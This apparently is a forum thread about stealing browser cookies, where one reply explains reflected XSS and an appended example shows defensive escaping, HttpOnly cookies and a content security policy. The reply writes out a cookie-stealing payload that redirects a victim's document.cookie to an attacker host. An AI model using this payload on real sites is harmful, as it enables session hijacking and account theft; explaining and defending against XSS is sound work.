This topic contains 1 reply, has 2 voices, and was last updated by Immortalem 1 month, 2 weeks ago.
- August 2, 2020 at 6:41 pm #290002
This would be good for stealing tokens.
- August 2, 2020 at 6:41 pm #290003
Look up the same origin policy. You’ll realize that this isn’t possible in modern browsers.
- August 2, 2020 at 6:41 pm #290004
Only if the website has an XSS vulnerability. For example, your victim sends a request with the cookie to the attacker’s webserver. One of the many ways looks like this:
The attacker sets up a webserver, then the attacker tricks the victim into clicking a URL with a script like
`http://www.website.com/<script>window.location = 'http://attacker/?cookie='+document.cookie</script>`
This will make the victim go to
`http://attacker/?cookie=(cookie from the previous website)`
That will trigger an HTTP request to the attacker’s server like ‘this PC has tried to request http://attacker/cookie=blablabla’, where blablabla represents the cookie of the victim from that one website.
This is a very simple example of XSS, read more here: https://excess-xss.com/
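The server-side view of the reflected XSS described in the reply above, as an added example that is not part of the original thread: a page that echoes the request path unescaped, the same page with HTML encoding, and response headers that keep the session cookie out of `document.cookie`. The page template, cookie name, header values and sample path are assumptions constructed for illustration.

```javascript
// Added example, not code from the thread. Names and values are hypothetical.

// Encode the characters that let text break out of an HTML text/attribute context.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Percent-decode a request path; malformed escapes are kept as literal text.
function safeDecode(path) {
  try { return decodeURIComponent(path); } catch { return path; }
}

// Vulnerable pattern: the requested path is echoed verbatim, so markup
// placed in the URL becomes markup in the response.
function notFoundPageUnsafe(requestPath) {
  return `<h1>Not found</h1><p>No page at ${safeDecode(requestPath)}</p>`;
}

// Hardened pattern: the same page with the path encoded for the HTML context.
function notFoundPageSafe(requestPath) {
  return `<h1>Not found</h1><p>No page at ${escapeHtml(safeDecode(requestPath))}</p>`;
}

// HttpOnly hides the cookie from document.cookie, Secure keeps it off plain
// HTTP, SameSite=Lax limits when it is sent on cross-site requests.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Second layer: a CSP without 'unsafe-inline' stops inline <script> from
// running even if an encoding bug slips through somewhere else.
function securityHeaders(sessionId) {
  return {
    'Content-Type': 'text/html; charset=utf-8',
    'Content-Security-Policy': "default-src 'self'; script-src 'self'",
    'Set-Cookie': sessionCookieHeader(sessionId),
  };
}

// Constructed sample request path carrying a harmless marker script.
const samplePath = '/%3Cscript%3Ealert(1)%3C%2Fscript%3E';
console.log(notFoundPageUnsafe(samplePath));
console.log(notFoundPageSafe(samplePath));
console.log(securityHeaders('constructed-session-id'));
```

Output encoding is the fix for the injection itself; `HttpOnly` and the CSP only limit what an injected script can do if encoding is missed somewhere.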